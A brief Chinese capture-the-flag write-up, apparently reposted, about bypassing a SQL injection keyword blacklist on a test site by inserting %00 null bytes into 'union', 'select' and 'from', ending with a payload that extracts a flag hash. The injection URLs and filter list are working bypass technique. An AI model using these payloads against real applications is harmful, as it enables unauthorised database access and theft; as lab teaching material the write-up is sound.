sql注入之大过滤
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sql注入之大过滤相关的知识,希望对你有一定的参考价值。
首先来到测试网站:http://103.238.227.13:10087/?id=1
通过最后两行发现有两个字段:
并且发现过滤了以下内容,郁闷。
table','union','and','or','load_file','create','delete','select','update','sleep','alter','drop','truncate','from','max','min','order','limit'
直接上sqlmap,然而并没有什么用。
开始尝试绕过:http://103.238.227.13:10087/?id=-1+union+select+1,database() %23
发现不行。
继续测试:用00截断:
http://103.238.227.13:10087/?id=-1 un%00ion sele%00ct 1,database() %23
发现成功了。
访问http://103.238.227.13:10087/?id=-1 un%00ion sele%00ct 1, hash fr%00om sql3.key %23得到flag
以上是关于sql注入之大过滤的主要内容,如果未能解决你的问题,请参考以下文章
安全测试 web安全测试 常规安全漏洞 可能存在SQL和JS注入漏洞场景分析。为什么自己没有找到漏洞,哪么可能存在漏洞场景是?SQL注入漏洞修复 JS注入漏洞修复 漏洞存在场景分析和修复示例(代码片段